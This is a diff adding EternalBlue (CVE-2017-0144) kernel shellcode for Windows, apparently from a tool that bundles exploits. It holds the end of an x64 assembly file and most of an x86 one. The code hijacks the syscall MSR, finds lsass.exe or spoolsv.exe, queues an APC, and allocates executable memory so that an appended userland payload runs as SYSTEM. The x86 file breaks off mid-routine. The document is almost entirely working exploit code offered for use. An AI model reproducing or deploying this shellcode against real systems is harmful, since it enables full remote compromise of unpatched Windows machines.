+DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
+DATA_NT_KERNEL_ADDR_OFFSET  EQU 0x8
+DATA_KAPC_OFFSET            EQU 0x10
+
+section .text
+global shellcode_start
+
+shellcode_start:
+
+setup_syscall_hook:
+    ; IRQL is DISPATCH_LEVEL when got code execution
+
+%ifdef WIN7
+    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
+    ; set nByteProcessed to free corrupted buffer after return
+    mov ecx, [rdx+0x2c]
+    mov [rdx+0x38], ecx
+%elifdef WIN8
+    mov rdx, [rsp+0x40]     ; fetch SRVNET_BUFFER address from function argument
+    ; fix pool pointer (rcx is -0x8150 from controlled argument value)
+    add rcx, rdx
+    mov [rdx+0x30], rcx
+    ; set nByteProcessed to free corrupted buffer after return
+    mov ecx, [rdx+0x48]
+    mov [rdx+0x40], ecx
+%endif
+    
+    push rbp
+    
+    call set_rbp_data_address_fn
+    
+    ; read current syscall
+    mov ecx, 0xc0000082
+    rdmsr
+    ; do NOT replace saved original syscall address with hook syscall
+    lea r9, [rel syscall_hook]
+    cmp eax, r9d
+    je _setup_syscall_hook_done
+    
+    ; if (saved_original_syscall != &KiSystemCall64) do_first_time_initialize
+    cmp dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
+    je _hook_syscall
+    
+    ; save original syscall
+    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4], edx
+    mov dword [rbp+DATA_ORIGIN_SYSCALL_OFFSET], eax
+    
+    ; first time on the target
+    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], 0
+
+_hook_syscall:
+    ; set a new syscall on running processor
+    ; setting MSR 0xc0000082 affects only running processor
+    xchg r9, rax
+    push rax
+    pop rdx     ; mov rdx, rax
+    shr rdx, 32
+    wrmsr
+    
+_setup_syscall_hook_done:
+    pop rbp
+    
+%ifdef WIN7
+    xor eax, eax
+%elifdef WIN8
+    xor eax, eax
+%endif
+    ret
+
+;========================================================================
+; Find memory address in HAL heap for using as data area
+; Return: rbp = data address
+;========================================================================
+set_rbp_data_address_fn:
+    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
+    ; Find some address to store the data, the data in this address MUST not be modified
+    ;   when exploit is rerun before syscall is called
+    lea rbp, [rel _set_rbp_data_address_fn_next + 0x1000]
+_set_rbp_data_address_fn_next:
+    shr rbp, 12
+    shl rbp, 12
+    sub rbp, 0x70   ; for KAPC struct too
+    ret
+
+
+syscall_hook:
+    swapgs
+    mov qword [gs:0x10], rsp
+    mov rsp, qword [gs:0x1a8]
+    push 0x2b
+    push qword [gs:0x10]
+    
+    push rax    ; want this stack space to store original syscall addr
+    ; save rax first to make this function continue to real syscall
+    push rax
+    push rbp    ; save rbp here because rbp is special register for accessing this shellcode data
+    call set_rbp_data_address_fn
+    mov rax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
+    add rax, 0x1f   ; adjust syscall entry, so we do not need to reverse start of syscall handler
+    mov [rsp+0x10], rax
+
+    ; save all volatile registers
+    push rcx
+    push rdx
+    push r8
+    push r9
+    push r10
+    push r11
+    
+    ; use lock cmpxchg for queueing APC only one at a time
+    xor eax, eax
+    mov dl, 1
+    lock cmpxchg byte [rbp+DATA_QUEUEING_KAPC_OFFSET], dl
+    jnz _syscall_hook_done
+
+    ;======================================
+    ; restore syscall
+    ;======================================
+    ; an error after restoring syscall should never occur
+    mov ecx, 0xc0000082
+    mov eax, [rbp+DATA_ORIGIN_SYSCALL_OFFSET]
+    mov edx, [rbp+DATA_ORIGIN_SYSCALL_OFFSET+4]
+    wrmsr
+    
+    ; allow interrupts while executing shellcode
+    sti
+    call r3_to_r0_start
+    cli
+    
+_syscall_hook_done:
+    pop r11
+    pop r10
+    pop r9
+    pop r8
+    pop rdx
+    pop rcx
+    pop rbp
+    pop rax
+    ret
+
+r3_to_r0_start:
+    ; save used non-volatile registers
+    push r15
+    push r14
+    push rdi
+    push rsi
+    push rbx
+    push rax    ; align stack by 0x10
+
+    ;======================================
+    ; find nt kernel address
+    ;======================================
+    mov r15, qword [rbp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiSystemCall64 is an address in nt kernel
+    shr r15, 0xc                ; strip to page size
+    shl r15, 0xc
+
+_x64_find_nt_walk_page:
+    sub r15, 0x1000             ; walk along page size
+    cmp word [r15], 0x5a4d      ; 'MZ' header
+    jne _x64_find_nt_walk_page
+    
+    ; save nt address for using in KernelApcRoutine
+    mov [rbp+DATA_NT_KERNEL_ADDR_OFFSET], r15
+
+    ;======================================
+    ; get current EPROCESS and ETHREAD
+    ;======================================
+    mov r14, qword [gs:0x188]    ; get _ETHREAD pointer from KPCR
+    mov edi, PSGETCURRENTPROCESS_HASH
+    call win_api_direct
+    xchg rcx, rax       ; rcx = EPROCESS
+    
+    ; r15 : nt kernel address
+    ; r14 : ETHREAD
+    ; rcx : EPROCESS    
+    
+    ;======================================
+    ; find offset of EPROCESS.ImageFilename
+    ;======================================
+    mov edi, PSGETPROCESSIMAGEFILENAME_HASH
+    call get_proc_addr
+    mov eax, dword [rax+3]  ; get offset from code (offset of ImageFilename is always > 0x7f)
+    mov ebx, eax        ; ebx = offset of EPROCESS.ImageFilename
+
+
+    ;======================================
+    ; find offset of EPROCESS.ThreadListHead
+    ;======================================
+    ; possible diff from ImageFilename offset is 0x28 and 0x38 (Win8+)
+    ; if offset of ImageFilename is more than 0x400, current is (Win8+)
+%ifdef WIN7
+    lea rdx, [rax+0x28]
+%elifdef WIN8
+    lea rdx, [rax+0x38]
+%else
+    cmp eax, 0x400      ; eax is still an offset of EPROCESS.ImageFilename
+    jb _find_eprocess_threadlist_offset_win7
+    add eax, 0x10
+_find_eprocess_threadlist_offset_win7:
+    lea rdx, [rax+0x28] ; edx = offset of EPROCESS.ThreadListHead
+%endif
+
+    
+    ;======================================
+    ; find offset of ETHREAD.ThreadListEntry
+    ;======================================
+%ifdef COMPACT
+    lea r9, [rcx+rdx]   ; r9 = ETHREAD listEntry
+%else
+    lea r8, [rcx+rdx]   ; r8 = address of EPROCESS.ThreadListHead
+    mov r9, r8
+%endif
+    ; ETHREAD.ThreadListEntry must be between ETHREAD (r14) and ETHREAD+0x700
+_find_ethread_threadlist_offset_loop:
+    mov r9, qword [r9]
+%ifndef COMPACT
+    cmp r8, r9          ; check end of list
+    je _insert_queue_apc_done    ; not found !!!
+%endif
+    ; if (r9 - r14 < 0x700) found
+    mov rax, r9
+    sub rax, r14
+    cmp rax, 0x700
+    ja _find_ethread_threadlist_offset_loop
+    sub r14, r9         ; r14 = -(offset of ETHREAD.ThreadListEntry)
+
+
+    ;======================================
+    ; find offset of EPROCESS.ActiveProcessLinks
+    ;======================================
+    mov edi, PSGETPROCESSID_HASH
+    call get_proc_addr
+    mov edi, dword [rax+3]  ; get offset from code (offset of UniqueProcessId is always > 0x7f)
+    add edi, 8      ; edi = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
+    
+
+    ;======================================
+    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
+    ;======================================
+    ; check process name
+_find_target_process_loop:
+    lea rsi, [rcx+rbx]
+    call calc_hash
+    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
+%ifndef COMPACT
+    jz found_target_process
+    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
+%endif
+    jz found_target_process
+    ; next process
+    mov rcx, [rcx+rdi]
+    sub rcx, rdi
+    jmp _find_target_process_loop
+
+
+found_target_process:
+    ; The allocation for userland payload will be in KernelApcRoutine.
+    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
+
+    ;======================================
+    ; save process PEB for finding CreateThread address in kernel KAPC routine
+    ;======================================
+    mov edi, PSGETPROCESSPEB_HASH
+    ; rcx is EPROCESS. no need to set it.
+    call win_api_direct
+    mov [rbp+DATA_PEB_ADDR_OFFSET], rax
+    
+    
+    ;======================================
+    ; iterate ThreadList until KeInsertQueueApc() success
+    ;======================================
+    ; r15 = nt
+    ; r14 = -(offset of ETHREAD.ThreadListEntry)
+    ; rcx = EPROCESS
+    ; edx = offset of EPROCESS.ThreadListHead
+
+%ifdef COMPACT
+    lea rbx, [rcx + rdx]
+%else
+    lea rsi, [rcx + rdx]    ; rsi = ThreadListHead address
+    mov rbx, rsi    ; use rbx for iterating thread
+%endif
+
+
+    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
+    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
+    ; try queueing APC then check KAPC member is more reliable.
+
+_insert_queue_apc_loop:
+    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
+    mov rbx, [rbx+8]
+%ifndef COMPACT
+    cmp rsi, rbx
+    je _insert_queue_apc_loop   ; skip list head
+%endif
+
+    ; find start of ETHREAD address
+    ; set it to rdx to be used for KeInitializeApc() argument too
+    lea rdx, [rbx + r14]    ; ETHREAD
+    
+    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
+    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
+    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
+    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
+    ; Teb member is next to Queue member.
+    mov edi, PSGETTHREADTEB_HASH
+    call get_proc_addr
+    mov eax, dword [rax+3]      ; get offset from code (offset of Teb is always > 0x7f)
+    cmp qword [rdx+rax-8], 0    ; KTHREAD.Queue MUST not be NULL
+    je _insert_queue_apc_loop
+    
+    ; KeInitializeApc(PKAPC,
+    ;                 PKTHREAD,
+    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
+    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
+    ;                 PKRUNDOWN_ROUTINE = NULL,
+    ;                 PKNORMAL_ROUTINE = userland_shellcode,
+    ;                 KPROCESSOR_MODE = UserMode (1),
+    ;                 PVOID Context);
+    lea rcx, [rbp+DATA_KAPC_OFFSET]     ; PAKC
+    xor r8, r8      ; OriginalApcEnvironment
+    lea r9, [rel kernel_kapc_routine]    ; KernelApcRoutine
+    push rbp    ; context
+    push 1      ; UserMode
+    push rbp    ; userland shellcode (MUST NOT be NULL)
+    push r8     ; NULL
+    sub rsp, 0x20   ; shadow stack
+    mov edi, KEINITIALIZEAPC_HASH
+    call win_api_direct
+    ; Note: KeInsertQueueApc() requires shadow stack. Adjust stack back later
+
+    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
+    ;   SystemArgument1 is second argument in usermode code (rdx)
+    ;   SystemArgument2 is third argument in usermode code (r8)
+    lea rcx, [rbp+DATA_KAPC_OFFSET]
+    ;xor edx, edx   ; no need to set it here
+    ;xor r8, r8     ; no need to set it here
+    xor r9, r9
+    mov edi, KEINSERTQUEUEAPC_HASH
+    call win_api_direct
+    add rsp, 0x40
+    ; if insertion failed, try next thread
+    test eax, eax
+    jz _insert_queue_apc_loop
+    
+    mov rax, [rbp+DATA_KAPC_OFFSET+0x10]     ; get KAPC.ApcListEntry
+    ; EPROCESS pointer 8 bytes
+    ; InProgressFlags 1 byte
+    ; KernelApcPending 1 byte
+    ; if success, UserApcPending MUST be 1
+    cmp byte [rax+0x1a], 1
+    je _insert_queue_apc_done
+    
+    ; manual remove list without lock
+    mov [rax], rax
+    mov [rax+8], rax
+    jmp _insert_queue_apc_loop
+
+_insert_queue_apc_done:
+    ; The PEB address is needed in kernel_apc_routine. Setting QUEUEING_KAPC to 0 should be in kernel_apc_routine.
+
+_r3_to_r0_done:
+    pop rax
+    pop rbx
+    pop rsi
+    pop rdi
+    pop r14
+    pop r15
+    ret
+
+;========================================================================
+; Call function in specific module
+; 
+; All function arguments are passed as calling normal function with extra register arguments
+; Extra Arguments: r15 = module pointer
+;                  edi = hash of target function name
+;========================================================================
+win_api_direct:
+    call get_proc_addr
+    jmp rax
+
+
+;========================================================================
+; Get function address in specific module
+; 
+; Arguments: r15 = module pointer
+;            edi = hash of target function name
+; Return: eax = offset
+;========================================================================
+get_proc_addr:
+    ; Save registers
+    push rbx
+    push rcx
+    push rsi                ; for using calc_hash
+
+    ; use rax to find EAT
+    mov eax, dword [r15+60]  ; Get PE header e_lfanew
+    mov eax, dword [r15+rax+136] ; Get export tables RVA
+
+    add rax, r15
+    push rax                 ; save EAT
+
+    mov ecx, dword [rax+24]  ; NumberOfFunctions
+    mov ebx, dword [rax+32]  ; FunctionNames
+    add rbx, r15
+
+_get_proc_addr_get_next_func:
+    ; When we reach the start of the EAT (we search backwards), we hang or crash
+    dec ecx                     ; decrement NumberOfFunctions
+    mov esi, dword [rbx+rcx*4]  ; Get rva of next module name
+    add rsi, r15                ; Add the modules base address
+
+    call calc_hash
+
+    cmp eax, edi                        ; Compare the hashes
+    jnz _get_proc_addr_get_next_func    ; try the next function
+
+_get_proc_addr_finish:
+    pop rax                     ; restore EAT
+    mov ebx, dword [rax+36]
+    add rbx, r15                ; ordinate table virtual address
+    mov cx, word [rbx+rcx*2]    ; desired functions ordinal
+    mov ebx, dword [rax+28]     ; Get the function addresses table rva
+    add rbx, r15                ; Add the modules base address
+    mov eax, dword [rbx+rcx*4]  ; Get the desired functions RVA
+    add rax, r15                ; Add the modules base address to get the functions actual VA
+
+    pop rsi
+    pop rcx
+    pop rbx
+    ret
+
+;========================================================================
+; Calculate ASCII string hash. Useful for comparing ASCII string in shellcode.
+; 
+; Argument: rsi = string to hash
+; Clobber: rsi
+; Return: eax = hash
+;========================================================================
+calc_hash:
+    push rdx
+    xor eax, eax
+    cdq
+_calc_hash_loop:
+    lodsb                   ; Read in the next byte of the ASCII string
+    ror edx, 13             ; Rotate right our hash value
+    add edx, eax            ; Add the next byte of the string
+    test eax, eax           ; Stop when found NULL
+    jne _calc_hash_loop
+    xchg edx, eax
+    pop rdx
+    ret
+
+
+; KernelApcRoutine is called when IRQL is APC_LEVEL in (queued) Process context.
+; But the IRQL is simply raised from PASSIVE_LEVEL in KiCheckForKernelApcDelivery().
+; Moreover, there is no lock when calling KernelApcRoutine.
+; So KernelApcRoutine can simply lower the IRQL by setting cr8 register.
+;
+; VOID KernelApcRoutine(
+;           IN PKAPC Apc,
+;           IN PKNORMAL_ROUTINE *NormalRoutine,
+;           IN PVOID *NormalContext,
+;           IN PVOID *SystemArgument1,
+;           IN PVOID *SystemArgument2)
+kernel_kapc_routine:
+    push rbp
+    push rbx
+    push rdi
+    push rsi
+    push r15
+    
+    mov rbp, [r8]       ; *NormalContext is our data area pointer
+        
+    mov r15, [rbp+DATA_NT_KERNEL_ADDR_OFFSET]
+    push rdx
+    pop rsi     ; mov rsi, rdx
+    mov rbx, r9
+    
+    ;======================================
+    ; ZwAllocateVirtualMemory(-1, &baseAddr, 0, &0x1000, 0x1000, 0x40)
+    ;======================================
+    xor eax, eax
+    mov cr8, rax    ; set IRQL to PASSIVE_LEVEL (ZwAllocateVirtualMemory() requires)
+    ; rdx is already address of baseAddr
+    mov [rdx], rax      ; baseAddr = 0
+    mov ecx, eax
+    not rcx             ; ProcessHandle = -1
+    mov r8, rax         ; ZeroBits
+    mov al, 0x40    ; eax = 0x40
+    push rax            ; PAGE_EXECUTE_READWRITE = 0x40
+    shl eax, 6      ; eax = 0x40 << 6 = 0x1000
+    push rax            ; MEM_COMMIT = 0x1000
+    ; reuse r9 for address of RegionSize
+    mov [r9], rax       ; RegionSize = 0x1000
+    sub rsp, 0x20   ; shadow stack
+    mov edi, ZWALLOCATEVIRTUALMEMORY_HASH
+    call win_api_direct
+    add rsp, 0x30
+%ifndef COMPACT
+    ; check error
+    test eax, eax
+    jnz _kernel_kapc_routine_exit
+%endif
+    
+    ;======================================
+    ; copy userland payload
+    ;======================================
+    mov rdi, [rsi]
+    lea rsi, [rel userland_start]
+    mov ecx, 0x600  ; fix payload size to 1536 bytes
+    rep movsb
+    
+    ;======================================
+    ; find CreateThread address (in kernel32.dll)
+    ;======================================
+    mov rax, [rbp+DATA_PEB_ADDR_OFFSET]
+    mov rax, [rax + 0x18]       ; PEB->Ldr
+    mov rax, [rax + 0x20]       ; InMemoryOrder list
+
+%ifdef COMPACT
+    mov rsi, [rax]      ; first one always be executable, skip it
+    lodsq               ; skip ntdll.dll
+%else
+_find_kernel32_dll_loop:
+    mov rax, [rax]       ; first one always be executable
+    ; offset 0x38 (WORD)  => must be 0x40 (full name len c:\windows\system32\kernel32.dll)
+    ; offset 0x48 (WORD)  => must be 0x18 (name len kernel32.dll)
+    ; offset 0x50  => is name
+    ; offset 0x20  => is dllbase
+    ;cmp word [rax+0x38], 0x40
+    ;jne _find_kernel32_dll_loop
+    cmp word [rax+0x48], 0x18
+    jne _find_kernel32_dll_loop
+    
+    mov rdx, [rax+0x50]
+    ; check only "32" because name might be lowercase or uppercase
+    cmp dword [rdx+0xc], 0x00320033   ; 3\x002\x00
+    jnz _find_kernel32_dll_loop
+%endif
+
+    mov r15, [rax+0x20]
+    mov edi, CREATETHREAD_HASH
+    call get_proc_addr
+
+    ; save CreateThread address to SystemArgument1
+    mov [rbx], rax
+    
+_kernel_kapc_routine_exit:
+    xor ecx, ecx
+    ; clear queueing kapc flag, allow other hijacked system call to run shellcode
+    mov byte [rbp+DATA_QUEUEING_KAPC_OFFSET], cl
+    ; restore IRQL to APC_LEVEL
+    mov cl, 1
+    mov cr8, rcx
+    
+    pop r15
+    pop rsi
+    pop rdi
+    pop rbx
+    pop rbp
+    ret
+
+  
+userland_start:
+userland_start_thread:
+    ; CreateThread(NULL, 0, &threadstart, NULL, 0, NULL)
+    xchg rdx, rax   ; rdx is CreateThread address passed from kernel
+    xor ecx, ecx    ; lpThreadAttributes = NULL
+    push rcx        ; lpThreadId = NULL
+    push rcx        ; dwCreationFlags = 0
+    mov r9, rcx     ; lpParameter = NULL
+    lea r8, [rel userland_payload]  ; lpStartAddr
+    mov edx, ecx    ; dwStackSize = 0
+    sub rsp, 0x20
+    call rax
+    add rsp, 0x30
+    ret
+    
+userland_payload:

--- a/src-tauri/exploits/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x86.asm
+++ b/src-tauri/exploits/CVE-2017-0144/Shellcode/eternalblue_kshellcode_x86.asm
@@ -1,0 +1,593 @@
+;
+; Windows x86 kernel shellcode from ring 0 to ring 3 by sleepya
+; The shellcode is written for eternalblue exploit: eternalblue_exploit7.py
+;
+;
+; Idea for Ring 0 to Ring 3 via APC from Sean Dillon (@zerosum0x0)
+;
+;
+; Note:
+; - The userland shellcode is run in a new thread of system process.
+;     If userland shellcode causes any exception, the system process get killed.
+; - On idle target with multiple core processors, the hijacked system call might take a while (> 5 minutes) to 
+;     get call because system call is called on other processors.
+; - Compiling shellcode with specific Windows version macro, corrupted buffer will be freed.
+;     This helps running exploit against same target repeatly more reliable.
+; - The userland payload MUST be appened to this shellcode.
+;
+; Reference:
+; - http://www.geoffchappell.com/studies/windows/km/index.htm (structures info)
+; - https://github.com/reactos/reactos/blob/master/reactos/ntoskrnl/ke/apc.c
+
+BITS 32
+ORG 0
+
+
+PSGETCURRENTPROCESS_HASH    EQU    0xdbf47c78
+PSGETPROCESSID_HASH    EQU    0x170114e1
+PSGETPROCESSIMAGEFILENAME_HASH    EQU    0x77645f3f
+LSASS_EXE_HASH    EQU    0xc1fa6a5a
+SPOOLSV_EXE_HASH    EQU    0x3ee083d8
+ZWALLOCATEVIRTUALMEMORY_HASH    EQU    0x576e99ea
+PSGETTHREADTEB_HASH    EQU    0xcef84c3e
+KEINITIALIZEAPC_HASH    EQU    0x6d195cc4
+KEINSERTQUEUEAPC_HASH    EQU    0xafcc4634
+PSGETPROCESSPEB_HASH    EQU    0xb818b848
+CREATETHREAD_HASH    EQU    0x835e515e
+
+
+
+DATA_ORIGIN_SYSCALL_OFFSET  EQU 0x0
+DATA_MODULE_ADDR_OFFSET     EQU 0x4
+DATA_QUEUEING_KAPC_OFFSET   EQU 0x8
+DATA_EPROCESS_OFFSET        EQU 0xc
+DATA_KAPC_OFFSET            EQU 0x10
+
+section .text
+global shellcode_start
+
+shellcode_start:
+
+setup_syscall_hook:
+    ; IRQL is DISPATCH_LEVEL when got code execution
+%ifdef WIN7
+    mov eax, [esp+0x20]     ; fetch SRVNET_BUFFER address from function argument
+    ; set nByteProcessed to free corrupted buffer after return
+    mov ecx, [eax+0x14]
+    mov [eax+0x1c], ecx
+%elifdef WIN8
+%endif
+    
+    pushad
+
+    call _setup_syscall_hook_find_eip
+_setup_syscall_hook_find_eip:
+    pop ebx
+
+    call set_ebp_data_address_fn
+    
+    ; read current syscall
+    mov ecx, 0x176
+    rdmsr
+    ; do NOT replace saved original syscall address with hook syscall
+    lea edi, [ebx+syscall_hook-_setup_syscall_hook_find_eip]
+    cmp eax, edi
+    je _setup_syscall_hook_done
+    
+    ; if (saved_original_syscall != &KiFastCallEntry) do_first_time_initialize
+    cmp dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
+    je _hook_syscall
+    
+    ; save original syscall
+    mov dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET], eax
+    
+    ; first time on the target, clear the data area
+    ; edx should be zero from rdmsr
+    mov dword [ebp+DATA_QUEUEING_KAPC_OFFSET], edx
+
+_hook_syscall:
+    ; set a new syscall on running processor
+    ; setting MSR 0x176 affects only running processor
+    mov eax, edi
+    xor edx, edx
+    wrmsr
+    
+_setup_syscall_hook_done:
+    popad
+%ifdef WIN7
+    xor eax, eax
+%elifdef WIN8
+    xor eax, eax
+%endif
+    ret 0x24
+
+;========================================================================
+; Find memory address in HAL heap for using as data area
+; Arguments: ebx = any address in this shellcode
+; Return: ebp = data address
+;========================================================================
+set_ebp_data_address_fn:
+    ; On idle target without user application, syscall on hijacked processor might not be called immediately.
+    ; Find some address to store the data, the data in this address MUST not be modified
+    ;   when exploit is rerun before syscall is called
+    lea ebp, [ebx + 0x1000]
+    shr ebp, 12
+    shl ebp, 12
+    sub ebp, 0x50   ; for KAPC struct too
+    ret
+
+
+syscall_hook:
+    mov ecx, 0x23
+    push 0x30
+    pop fs
+    mov ds,cx
+    mov es,cx
+    mov ecx, dword [fs:0x40]
+    mov esp, dword [ecx+4]
+    
+    push ecx    ; want this stack space to store original syscall addr
+    pushfd
+    pushad
+    
+    call _syscall_hook_find_eip
+_syscall_hook_find_eip:
+    pop ebx
+    
+    call set_ebp_data_address_fn
+    mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
+    
+    add eax, 0x17   ; adjust syscall entry, so we do not need to reverse start of syscall handler
+    mov [esp+0x24], eax ; 0x4 (pushfd) + 0x20 (pushad) = 0x24
+    
+    ; use lock cmpxchg for queueing APC only one at a time
+    xor eax, eax
+    cdq
+    inc edx
+    lock cmpxchg byte [ebp+DATA_QUEUEING_KAPC_OFFSET], dl
+    jnz _syscall_hook_done
+
+    ;======================================
+    ; restore syscall
+    ;======================================
+    ; an error after restoring syscall should never occur
+    mov ecx, 0x176
+    cdq
+    mov eax, [ebp+DATA_ORIGIN_SYSCALL_OFFSET]
+    wrmsr
+    
+    ; allow interrupts while executing shellcode
+    sti
+    call r3_to_r0_start
+    cli
+    
+_syscall_hook_done:
+    popad
+    popfd
+    ret
+
+r3_to_r0_start:    
+    ;======================================
+    ; find nt kernel address
+    ;======================================
+    mov eax, dword [ebp+DATA_ORIGIN_SYSCALL_OFFSET]      ; KiFastCallEntry is an address in nt kernel
+    shr eax, 0xc                ; strip to page size
+    shl eax, 0xc
+
+_find_nt_walk_page:
+    sub eax, 0x1000             ; walk along page size
+    cmp word [eax], 0x5a4d      ; 'MZ' header
+    jne _find_nt_walk_page
+    
+    ; save nt address
+    mov [ebp+DATA_MODULE_ADDR_OFFSET], eax
+
+    ;======================================
+    ; get current EPROCESS and ETHREAD
+    ;======================================
+    mov eax, PSGETCURRENTPROCESS_HASH
+    call win_api_direct
+    xchg edi, eax       ; edi = EPROCESS
+    
+    ;======================================
+    ; find offset of EPROCESS.ImageFilename
+    ;======================================
+    mov eax, PSGETPROCESSIMAGEFILENAME_HASH
+    push edi
+    call win_api_direct
+    sub eax, edi
+    mov ecx, eax        ; ecx = offset of EPROCESS.ImageFilename
+
+    ;======================================
+    ; find offset of EPROCESS.ThreadListHead
+    ;======================================
+    ; possible diff from ImageFilename offset is 0x1c and 0x24 (Win8+)
+    ; if offset of ImageFilename is 0x170, current is (Win8+)
+%ifdef WIN7
+    lea ebx, [eax+0x1c]
+%elifdef WIN8
+    lea ebx, [eax+0x24]
+%else
+    cmp eax, 0x170      ; eax is still an offset of EPROCESS.ImageFilename
+    jne _find_eprocess_threadlist_offset_win7
+    add eax, 0x8
+_find_eprocess_threadlist_offset_win7:
+    lea ebx, [eax+0x1c] ; ebx = offset of EPROCESS.ThreadListHead
+%endif
+
+    
+    ;======================================
+    ; find offset of ETHREAD.ThreadListEntry
+    ;======================================
+    ; edi = EPROCESS
+    ; ebx = offset of EPROCESS.ThreadListHead
+    lea esi, [edi+ebx]   ; esi = address of EPROCESS.ThreadListHead
+    mov eax, dword [fs:0x124]    ; get _ETHREAD pointer from KPCR
+    ; ETHREAD.ThreadListEntry must be between ETHREAD (eax) and ETHREAD+0x400
+_find_ethread_threadlist_offset_loop:
+    mov esi, dword [esi]
+    ; if (esi - edi < 0x400) found
+    mov edx, esi
+    sub edx, eax
+    cmp edx, 0x400
+    ja _find_ethread_threadlist_offset_loop ; need unsigned comparison
+    push edx        ; save offset of ETHREAD.ThreadListEntry to stack
+
+
+    ;======================================
+    ; find offset of EPROCESS.ActiveProcessLinks
+    ;======================================
+    mov eax, PSGETPROCESSID_HASH
+    call get_proc_addr
+    mov eax, dword [eax+0xa]   ; get offset from code (offset of UniqueProcessId is always > 0x7f)
+    lea edx, [eax+4]    ; edx = offset of EPROCESS.ActiveProcessLinks = offset of EPROCESS.UniqueProcessId + sizeof(EPROCESS.UniqueProcessId)
+    
+    ;======================================
+    ; find target process by iterating over EPROCESS.ActiveProcessLinks WITHOUT lock 
+    ;======================================
+    ; edi = EPROCESS
+    ; ecx = offset of EPROCESS.ImageFilename
+    ; edx = offset of EPROCESS.ActiveProcessLinks
+_find_target_process_loop:
+    lea esi, [edi+ecx]
+    call calc_hash
+    cmp eax, LSASS_EXE_HASH    ; "lsass.exe"
+    jz found_target_process
+%ifndef COMPACT
+    cmp eax, SPOOLSV_EXE_HASH  ; "spoolsv.exe"
+    jz found_target_process
+%endif
+    ; next process
+    mov edi, [edi+edx]
+    sub edi, edx
+    jmp _find_target_process_loop
+
+
+found_target_process:
+    ; The allocation for userland payload will be in KernelApcRoutine.
+    ; KernelApcRoutine is run in a target process context. So no need to use KeStackAttachProcess()
+
+    ;======================================
+    ; save EPROCESS for finding CreateThread address in kernel KAPC routine
+    ;======================================
+    mov [ebp+DATA_EPROCESS_OFFSET], edi
+    
+    
+    ;======================================
+    ; iterate ThreadList until KeInsertQueueApc() success
+    ;======================================
+    ; edi = EPROCESS
+    ; ebx = offset of EPROCESS.ThreadListHead
+    
+    lea ebx, [edi+ebx]  ; use ebx for iterating thread
+    lea esi, [ebp+DATA_KAPC_OFFSET] ; esi = KAPC address
+    pop edi ; edi = offset of ETHREAD.ThreadListEntry
+
+
+    ; checking alertable from ETHREAD structure is not reliable because each Windows version has different offset.
+    ; Moreover, alertable thread need to be waiting state which is more difficult to check.
+    ; try queueing APC then check KAPC member is more reliable.
+
+_insert_queue_apc_loop:
+    ; move backward because non-alertable and NULL TEB.ActivationContextStackPointer threads always be at front
+    mov ebx, [ebx+4]
+    ; no check list head
+    
+    ; userland shellcode (at least CreateThread() function) need non NULL TEB.ActivationContextStackPointer.
+    ; the injected process will be crashed because of access violation if TEB.ActivationContextStackPointer is NULL.
+    ; Note: APC routine does not require non-NULL TEB.ActivationContextStackPointer.
+    ; from my observation, KTRHEAD.Queue is always NULL when TEB.ActivationContextStackPointer is NULL.
+    ; Teb member is next to Queue member.
+    mov eax, PSGETTHREADTEB_HASH
+    call get_proc_addr
+    mov eax, dword [eax+0xa]    ; get offset from code (offset of Teb is always > 0x7f)
+%ifdef WIN7
+    sub eax, edi
+    cmp dword [ebx+eax-12], 0   ; KTHREAD.Queue MUST not be NULL
+%elifdef WIN8
+    sub eax, edi
+    cmp dword [ebx+eax-4], 0    ; KTHREAD.Queue MUST not be NULL
+%else
+    cmp al, 0xa0                ; win8+ offset is 0xa8
+    ja _kthread_queue_check
+    sub al, 8                   ; late 5.2 to 6.1, displacement is 0xc
+_kthread_queue_check:
+    sub eax, edi
+    cmp dword [ebx+eax-4], 0    ; KTHREAD.Queue MUST not be NULL
+%endif
+    je _insert_queue_apc_loop
+    
+    ; KeInitializeApc(PKAPC,
+    ;                 PKTHREAD,
+    ;                 KAPC_ENVIRONMENT = OriginalApcEnvironment (0),
+    ;                 PKKERNEL_ROUTINE = kernel_apc_routine,
+    ;                 PKRUNDOWN_ROUTINE = NULL,
+    ;                 PKNORMAL_ROUTINE = userland_shellcode,
+    ;                 KPROCESSOR_MODE = UserMode (1),
+    ;                 PVOID Context);
+    xor eax, eax
+    push ebp    ; context
+    push 1      ; UserMode
+    push ebp    ; userland shellcode (MUST NOT be NULL)
+    push eax    ; NULL
+    call _init_kapc_find_kroutine
+_init_kapc_find_kroutine:
+    add dword [esp], kernel_kapc_routine-_init_kapc_find_kroutine  ; KernelApcRoutine
+    push eax    ; OriginalApcEnvironment
+    push ebx
+    sub [esp], edi  ; ETHREAD
+    push esi    ; KAPC
+    mov eax, KEINITIALIZEAPC_HASH
+    call win_api_direct
+
+
+    ; BOOLEAN KeInsertQueueApc(PKAPC, SystemArgument1, SystemArgument2, 0);
+    ;   SystemArgument1 is second argument in usermode code
